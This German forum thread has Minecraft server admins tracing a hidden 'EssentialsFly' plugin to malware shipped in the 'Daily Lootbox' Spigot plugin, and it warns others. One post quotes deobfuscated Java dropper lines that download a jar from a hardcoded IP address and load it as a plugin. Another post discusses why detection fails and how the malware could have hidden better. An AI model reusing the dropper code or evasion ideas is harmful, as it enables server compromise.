Was ist Enabling EssentialsFly v1.6.4 ??

[Starnos]

Hallo liebe User/innen,

ich habe auf meinen Server ein Plugin womit man Fahrzeuge ohne Mod´s haben kann evtl kennt das ja einer ? Das Vehicle plugin.

Bis jetzt lief alles 1a aber seit heute hab ich ein mächtiges Problem. Die Fahrzeuge lassen sich nicht mehr lenken. Die seteuern nur noch im Kreis.
Es wurde nix verändert am Server und auch keine Plugins aktualisiert.

Also habe ich ausschluss Verfahren gemacht.
Erst alle weg und dann nur das Plugin selbst drauf gelassen. Da funzt es alles 1a ohne Probleme... nun mach ich ein Plugin mit drauf egal welches das spielt keine Rolle und es funktioniert nicht mehr.....das komische ist in der konsole wird dann noch ein Plugin mit installiert: Enabling EssentialsFly v1.6.4. Dieses wird auch unter /pl angezeigt aber es wurde nicht mit drauf installiert...auch im Plugin Ordner ist es nicht zu finden.

Also hatte ich den Testserver ganz frisch gemacht Ohne ein einziges Plugin. Da kommt wieder das EssentialsFly v1.6.4.
Hat einer auch schonmal so ein Problem gehabt?

Oder hat MC wieder an der Spielmechanik gefummelt??

 

[UnityGaming]

thousands of events, but the event names are hashed/obfuscated

Das konnte ich im Code auch beobachten. Da ist ne Menge los.

Vehicle Plugin

Vielleicht sollten wir da nochmal in den Code schauen.
Ist das ein Paid plugin bzw. liegt irgendwo der Source Code offen?

Irgendein Plugin muss den Schädling ja mitliefern.

Ich hab mich in die Diskussion bei Spigot mal eingeklinkt.

 

[UnityGaming]

Achhh du bist das ^^ sag das doch gleich ^^

Das würde ja die Überraschung kaputt machen.

 

[Starnos]

Der Verursacher des Virus ist nun auch bekannt. Es war das Plugin Daily Lootbox
Ich kann jeden nur raten die Finger von diesem Plugin zu lassen !!!

 

[UnityGaming]

Hier finden sich auch nun kleinere Infos dazu, was alles gesendet wird und wohin:
https://www.spigotmc.org/threads/alert-mc-security-threat-adwind-malware.321597/

Die Auflistung beinhaltet unter anderem Quellen zum "Hersteller".

Hier sogar mehrere Videologs von der Produktion:
https://www.youtube.com/channel/UCOFbtJGP7j6k7MSGBzhIZLA/videos

Da kommt bei mir langsam die Frage auf, wie die Nutzer das übersehen konnten so lange? Es geschah ja scheinbar gar nicht so heimlich... sondern direkt vor ihrer Nase.

 

[Chrisliebär❤️]

Da kommt bei mir langsam die Frage auf, wie die Nutzer das übersehen konnten so lange? Es geschah ja scheinbar gar nicht so heimlich... sondern direkt vor ihrer Nase.

Die Antwort ist ja wohl offensichtlich. Erstmal haben die meisten Nutzer von Spigot keine Ahnung. Das Wissen um so ein Plugin überhaupt zu erkennen dürfte den meisten Fehlen. Aber lass die Frage doch umdrehen? Was muss ich tun, damit ich das Plugin erkenne? Da gibt es ja mehrere Möglichkeiten:

Virenscanner: Klingt vielleicht erstmal am einfachsten. Problem ist, dass Virenscanner einfach nutzlos sind. Lässt sich sogar mathematisch Beweisen, dass ein Virenscanner niemals jeden Virus erkennen kann. Abgesehen von einer festen Signaturdatenbank bringt dir auch die Verhaltensanalyse nix. Das Plugin arbeitet komplett im Serverprozess, absolut unverdächtig und kein Virenscanner ist überhaupt in der Lage Java Bytecode zu verstehen. Das einzige Verdächtige ist die Bytecode Patcher Library und worran genau soll die erkannt werden? Ist ja Obfuscated.

Serverlogs: Tja. Das wird auch nix. Da wir hier vor allem von Hobbyentwicklern reden, haben die meisten keine Ahnung wie man Logging in großen Anwendungen macht. Wieviele Plugins kennst du, die verschiedene Loglevels erlauben? Spigot nutzt sogar ein Loggingframework womit man zentrale Loglevels einstellen könnte, aber da niemand damit umgehen kann, wird's nicht benutzt. Ansonsten wäre das Plugin überhaupt nicht aufgefallen, wenn es sich nicht selbst als Plugin angemeldet hätte. Es wäre viel sinnvoller gewesen sich in ein Plugin reinzupatchen und einfach die onEnable Methode für die Initialisierung zu übernehmen. Oder die Loggingausgabe sowie die Pluginliste abzufangen und zu filtern.

Netzwerkverkehr: Da es scheinbar vollkommen akzeptabel ist, dass jedes Plugin Spyware in Form von Metriks mitbringt und auch andere Daten hat sein Zuhause schickt, braucht man sich nicht wundern, wenn niemand bock hat sich durch zehn Verbindungen zu kämpfen, die alle bei irgendwelchen AWS Instanzen laden. Solange diese Praxis akzeptiert wird, wird sie fortgesetzt.

CPU Auslastung: lol. So scheiße wie Minecraft programmiert wurde kann sich dein Server sogar ohne Plugins komplett zerschießen. Dafür braucht es überhaupt keinen Schadecode.

Plugins laufen mit Userrechten und sind ein gewaltiges Sicherheitsproblem. Aus diesem Grund gibt es in der Windows 10 Version auch keine Plugins mehr. Das ist einfach extrem gefährlich und muss gut isoliert werden. Mit Java ist das zwar möglich, aber wie gut das funktioniert sieht man ja wenn man sich die Versionshistorie des Browserplugins ansieht. Eigentlich gehört da eine Skriptsprache wie Lua eingebaut, die sich einfacherer isolieren lässt. Damit kann man zwar vor allem mit Zeugs wie den Meltdown und Spectre Angriffen noch immer auf den Arbeitsspeicher zugreifen, aber zumindest sind die Prozesse dann erstmal isoliert und der Angriff deutlich komplizierter gemacht.

Und ganz am Schluss steht das blinde Vertrauen in andere und Technik. Man hat selbst keine Ahnung wie die Technik funktioniert, was ein Virenscanner überhaupt leistet, was ein Mensch leisten kann, wenn er mal kurz in den Quellcode eines Plugins guckt. "Die bei Spigot gucken schon dass alles sicher ist". Du siehst ja selbst, wie oft hier im Forum Virustotal Link auftauchen, in dem glauben ein Virenscanner erkennt schon alles, oder zumindest fast alles. Selbst im Spigotforum ist wieder ein solcher Link (von dir?). Nichts davon erkennt er.

Edit: Nachdem ich den Spigot Thread überflogen hab, stelle ich wieder fest, wie blind der Glauben in Virenscanner ist. Als ob man einfach nur einen magischen Virenscanner baut und plötzlich erkennt der alle Viren und man muss sich um nichts mehr kümmern. Wenns so einfach wäre, dann gäbs das schon, schließlich gibt es eine ganze Industrie die damit Geld verdienen möchte.

 

[UnityGaming]

Vielleicht habe ich in der Hinsicht auch eine zu hohe Erwartungshaltung. Dennoch...
Wie die das im Spigotforum handhaben ist mir nicht bekannt - ich spiele dort toter Igel, mehr nicht.

 

[UnityGaming]

Es gelang nun jemandem aus den Spigot Foren das gesamte Plugin zu deobfuscaten.
Hier sind die betroffenen Zeilen, mit denen der Schädling geladen wird: (Auszug aus "DailyLootbox")

FileUtils.copyURLToFile(new URL("http://31.214.243.114/fefegfregt.jar"), new File("plugins/PluginMetrics.jar"));
Bukkit.getPluginManager().enablePlugin(Bukkit.getPluginManager().loadPlugin(new File("plugins/PluginMetrics.jar")));

http://www.utrace.de/whois/31.214.243.114 führt zu "DeinServerHost" auf den ersten Blick.

 

[Chrisliebär❤️]

Süß. Mehr fällt mir dazu nimmer ein.

 

[UnityGaming]

Süß.

Du musst dir mal den Discord von dem Typen anschauen. Extrem unterhaltsam geht es da grade zu!

 

[Starnos]

Dieser nette Typ ist wieder da..gleiches Plugin anderer Name...was bewirkt der damit ???

https://www.spigotmc.org/resources/lootbox-per-day.57671/

 

[UnityGaming]

was bewirkt der damit ???

Opfer sammeln.

Vielleicht trägt das letzten Endes sogar positiv zu Spigots Community bei.
Wenn man weiß, dass jemand aktiv Plugins infiziert und unter die Leute schmuggelt, geht man evtl. mit gesunder Skepsis an die Sache ran in Zukunft, anstatt blind irgendwelche fremde Software auf seine Kiste zu schmeißen.